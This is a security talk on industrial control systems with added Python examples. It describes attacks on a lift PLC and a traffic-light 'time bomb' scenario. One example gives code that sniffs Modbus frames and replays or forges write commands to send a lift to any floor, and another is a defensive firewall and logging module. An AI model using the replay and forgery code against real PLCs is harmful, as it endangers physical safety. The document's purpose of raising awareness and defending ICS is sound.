Cyber Security Research on Industrial Control Systems - SM Yiu (PowerPoint presentation)



SLIDE 1

Cyber Security Research on Industrial Control Systems

SM Yiu Department of Computer Science The University of Hong Kong


Cyber-security for industry 4.0 conference 23 June, 2017

SLIDE 2


Will the following only be seen in movies?

Movies: Cyber Hacking (2015); Italian Job (2003)

SLIDE 3


IT IS REAL!

(Defcon Hacking conference 2014)

SLIDE 4


2016 (US): 295 reports of ICS attacks (20%)
  • Mar: New York dam (control system accessed)
  • April: German nuclear power plant (malware)
  • Light-rail system, ...

SLIDE 5


The purpose of the talk is to raise the awareness of the community on the security issues of ICS.

SLIDE 6


Key components of an ICS

(Guide to Industrial Control System (ICS) Security, NIST, 2015)

SLIDE 7


SCADA, a typical ICS: numerous attack points

(Guide to Industrial Control System (ICS) Security, NIST, 2015)

SLIDE 8


PLC (programmable logic controller)

  • A small digital computer used for the automation of various electro-mechanical processes in industry.
  • Specially designed to survive in harsh conditions.
  • Programs can be written on a computer and downloaded to the PLC via a communication link (e.g. a cable).
  • A "hard" real-time system: output is produced in response to input conditions within a bounded time.

SLIDE 9


Are PLCs critical? In what systems are they used?

SLIDE 10


Yueng Long Sewage Treatment system

SLIDE 11


Ventilation Control and Monitoring System for Tunnel of subway/railway

(pictures from MTR report)

SLIDE 12

How easy is it to hack a PLC?

  • PLCs are NOT secure: a PLC has no proper protection built in, and its communication protocol has neither authentication nor encryption.
  • PLCs can be discovered by packet sniffing.

SLIDE 13

Touch panel for floor selection; PLC to control the lift

SLIDE 14

A Touch panel to control the lift

SLIDE 15

Sensor to detect the current floor

SLIDE 16

Switch that connects the PLC and Touch Panel

SLIDE 17

The PLC that controls the Lift system

SLIDE 18

Attack on the Lift System


Hacker: connect to the PLC and control the lift directly. NO authentication.

Q: Some engineers feel that it is not easy to connect to it because it is a "closed" system. Do you agree? (Network capability)

SLIDE 19

Five attacks (4 with demos)

  • 1. DoS attack
    – 100 MB/s is already enough to stop the PLC from receiving any valid commands.
    – No advanced hacking knowledge needed: packet generation programs are freely available on the Internet.

SLIDE 20
  • 2. Command injection attack
    – We connect to the PLC directly and generate random commands to it.
    – A little more knowledge is needed: a replay attack!

SLIDE 21
  • 3. Control the lift
    – Having taken control of the PLC, the attacker can order the lift to whatever level.
    – Requires understanding the commands sent from the touch panel to the PLC.

SLIDE 22
  • 4. Manipulate the sensor values
    – Actively modify the sensor values.
    – Requires more knowledge about the sensor variables stored in the PLC.

SLIDE 23
  • 5. Time bomb: hack the traffic lights
    – Build a time bomb that turns both the car and the pedestrian lights green at the same time, ONCE IN A WHILE.
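The discovery-by-sniffing point on SLIDE 12 and attacks 2 and 3 above (replay and command injection) can be made concrete with a protocol parser. The following is an added example, not code from the talk or its authors. It assumes Modbus/TCP as the unauthenticated PLC protocol (the deck does not name the lift's protocol, and the same reasoning applies to other plaintext fieldbus protocols); the register map (0x0010 = requested floor, 0x0020 = current-floor sensor) and the captured frames are constructed for illustration.

```python
"""Modbus/TCP as an illustrative unauthenticated PLC protocol: passive
discovery by sniffing, command replay and command injection.

Constructed example: the protocol choice, register addresses and the
captured frames are assumptions, not the lift system from the talk.
"""
import struct
from dataclasses import dataclass

MBAP_LEN = 7  # transaction id (2) + protocol id (2) + length (2) + unit id (1)
READ_HOLDING_REGISTERS = 0x03
WRITE_SINGLE_REGISTER = 0x06


@dataclass(frozen=True)
class ModbusRequest:
    transaction_id: int
    unit_id: int       # which PLC/slave the request is addressed to
    function: int
    address: int       # register address
    value: int         # written value (0x06) or register count (0x03)


def parse_request(frame: bytes) -> ModbusRequest:
    """Decode a Modbus/TCP request. Every field is plaintext and nothing in
    the frame authenticates the sender or ties it to a session."""
    if len(frame) < MBAP_LEN + 5:
        raise ValueError("frame too short")
    tid, proto, length, unit = struct.unpack(">HHHB", frame[:MBAP_LEN])
    if proto != 0:
        raise ValueError("protocol id must be 0 for Modbus")
    if length != len(frame) - 6:          # length covers unit id + PDU
        raise ValueError("length field does not match frame")
    func = frame[MBAP_LEN]
    if func not in (READ_HOLDING_REGISTERS, WRITE_SINGLE_REGISTER):
        raise ValueError(f"unsupported function 0x{func:02x}")
    address, value = struct.unpack(">HH", frame[MBAP_LEN + 1:MBAP_LEN + 5])
    return ModbusRequest(tid, unit, func, address, value)


def build_write_single_register(tid: int, unit: int, address: int, value: int) -> bytes:
    """Encode function 0x06. An attacker needs nothing but these four
    numbers, all of which a sniffed frame reveals."""
    pdu = struct.pack(">BHH", WRITE_SINGLE_REGISTER, address, value)
    return struct.pack(">HHHB", tid, 0, len(pdu) + 1, unit) + pdu


def discover_plcs(frames):
    """Passive discovery: map unit id -> {(function, address)} from sniffed
    traffic, without sending a single packet."""
    seen = {}
    for frame in frames:
        try:
            req = parse_request(frame)
        except ValueError:
            continue                       # not a frame we understand
        seen.setdefault(req.unit_id, set()).add((req.function, req.address))
    return seen


def replay(frame: bytes, new_tid: int) -> bytes:
    """Re-issue a captured write. Only the transaction id differs, and the
    PLC does not check it against any state, so the replay is accepted."""
    req = parse_request(frame)
    return build_write_single_register(new_tid, req.unit_id, req.address, req.value)


def forge_floor_request(frame: bytes, new_tid: int, floor: int) -> bytes:
    """Command injection: keep the sniffed unit id and register, change the
    value, i.e. order the lift to whatever level."""
    req = parse_request(frame)
    return build_write_single_register(new_tid, req.unit_id, req.address, floor)


# Constructed "capture" of touch-panel -> PLC traffic (assumed register map:
# 0x0010 = requested floor, 0x0020 = current-floor sensor).
CAPTURED_FRAMES = [
    bytes.fromhex("0001 0000 0006 01 06 0010 0005"),  # write requested floor = 5
    bytes.fromhex("0002 0000 0006 01 03 0020 0001"),  # poll current-floor sensor
    bytes.fromhex("cafe babe"),                       # unrelated bytes on the wire
]


if __name__ == "__main__":
    print("discovered:", discover_plcs(CAPTURED_FRAMES))
    print("replayed:  ", replay(CAPTURED_FRAMES[0], 0x0099).hex())
    print("forged:    ", forge_floor_request(CAPTURED_FRAMES[0], 0x009a, 9).hex())
```

The point the parser makes is structural: after the 7-byte header there is nothing in the frame that the PLC could use to tell the touch panel's write from an attacker's copy of it, so "replay" is just re-sending bytes, and "injection" is changing one 16-bit field in them.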

SLIDE 24


Again, a real case in US (Dec 2015).

They examined the traffic light and performed forensic analysis on the PLC ...

SLIDE 25


Surprisingly...

Event/log                            Date/time
Program last modified                Dec 08 2015 3:05pm
Program last compiled                Dec 08 2015 5:46pm
Program last uploaded (by engineer)  Dec 08 2015 5:46pm
Program last uploaded (by ????)      Dec 26 2015 4:18am
Accident                             Dec 26 2015 pm

SLIDE 26


What can we do? (Our research directions besides attacks)

  • Build a protection layer
    * Difficulty: low processing power and limited memory/buffer of the PLC.
  • Add in a forensic module
    * For detection and investigation.

SLIDE 27


Building a protection layer

(i) E.g. a firewall.
(ii) A lightweight detection module inside the PLC.

Remark: we also have some interesting methods for forensics (e.g. how to log events with limited buffers/power).
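One shape such a protection layer can take, as an added example that is not the research group's own module: a gatekeeper that could run on a firewall in front of the PLC or, trimmed down, inside it. It combines a source allowlist, a per-register write policy, a sliding-window flood detector for the DoS case, and an event log kept in a fixed-size ring buffer because of the limited-buffer constraint. The source addresses, Modbus-style function codes, register ranges, rate limit and the traffic it runs over are all assumptions constructed for the example.

```python
"""A lightweight gatekeeper for a PLC: source allowlist, per-register write
policy, a flood (DoS) detector and a fixed-size forensic log.

Constructed example; the addresses, function codes (Modbus-style), register
ranges, limits and traffic are assumptions, not the deck's own system.
"""
from collections import Counter, defaultdict, deque
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    ts: float        # arrival time in seconds
    src: str         # source IP
    function: int    # protocol function code
    address: int     # first register touched


READ_FUNCTIONS = {0x01, 0x02, 0x03, 0x04}
WRITE_FUNCTIONS = {0x05, 0x06, 0x0F, 0x10}

# Who may do what (assumed addresses). Anything not listed is denied.
POLICY = {
    "10.0.0.5": {"read": True, "write": range(0x0010, 0x0020)},   # touch panel / HMI
    "10.0.0.9": {"read": True, "write": range(0x0000, 0x10000)},  # engineering station
}
RATE_LIMIT = 50   # packets per source per sliding 1 s window
LOG_SIZE = 64     # the PLC has little memory, so the event log is a ring buffer


class Gatekeeper:
    def __init__(self):
        self.windows = defaultdict(deque)   # src -> timestamps in the last second
        self.flooding = set()               # sources currently over the rate limit
        self.log = deque(maxlen=LOG_SIZE)   # oldest entries fall off the end
        self.dropped = Counter()            # per-source drop counts survive eviction

    def decide(self, p: Packet) -> str:
        # Rate check runs first: it is cheap and it shields the policy code
        # (and the PLC behind it) from being swamped.
        w = self.windows[p.src]
        w.append(p.ts)
        while w and p.ts - w[0] > 1.0:
            w.popleft()
        if len(w) > RATE_LIMIT:
            # Log a flood once per episode, not once per packet; otherwise the
            # attacker's own packets would push earlier evidence out of the
            # small buffer.
            if p.src not in self.flooding:
                self.flooding.add(p.src)
                self._log(p, "flood")
            self.dropped[p.src] += 1
            return "deny"
        self.flooding.discard(p.src)

        rule = POLICY.get(p.src)
        if rule is None:
            return self._deny(p, "unknown source")
        if p.function in READ_FUNCTIONS and rule["read"]:
            return "allow"
        if p.function in WRITE_FUNCTIONS and p.address in rule["write"]:
            return "allow"
        return self._deny(p, "not permitted")

    def _deny(self, p: Packet, reason: str) -> str:
        self._log(p, reason)
        self.dropped[p.src] += 1
        return "deny"

    def _log(self, p: Packet, reason: str) -> None:
        self.log.append((p.ts, p.src, p.function, p.address, reason))

    def events(self):
        return list(self.log)


def sample_traffic():
    """Constructed traffic: normal HMI activity, a rogue laptop, an HMI write
    outside its allowed registers, then a 200-packet burst from the HMI's
    address (a spoofed or compromised panel)."""
    pkts = [
        Packet(0.0, "10.0.0.5", 0x03, 0x0020),   # HMI polls current floor
        Packet(0.1, "10.0.0.5", 0x06, 0x0010),   # HMI writes requested floor
        Packet(0.2, "10.0.0.77", 0x06, 0x0010),  # rogue laptop tries the same write
        Packet(0.3, "10.0.0.5", 0x06, 0x0100),   # HMI writes a register outside its range
    ]
    pkts += [Packet(5.0 + i * 0.0025, "10.0.0.5", 0x03, 0x0020) for i in range(200)]
    return pkts


def run_sample():
    g = Gatekeeper()
    decisions = [g.decide(p) for p in sample_traffic()]
    return g, decisions


if __name__ == "__main__":
    g, decisions = run_sample()
    print("allowed:", decisions.count("allow"), "denied:", decisions.count("deny"))
    for e in g.events():
        print(e)
    print("drops per source:", dict(g.dropped))
```

Two design choices matter for the forensic side. The per-source drop counter is a few integers and survives even when the ring buffer has wrapped, so an investigator still learns that a flood happened and how large it was; and a flood is logged once per episode, so a burst of 200 packets leaves one log entry rather than evicting the earlier "unknown source" and "not permitted" events that point at the actual intrusion.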

SLIDE 28


Acknowledgements

Thank you

  • Dr. KP Chow, leader of our research group

Our talented research students/engineers

  • Raymond Chan *
  • Chun Fai Chan, Ken Yau
  • Han Yu, Bo Zhang, Yuan Zhang

Our partner: Cisco

** We are more than willing to collaborate with industry on related R&D problems **

Alex Choy, PolyU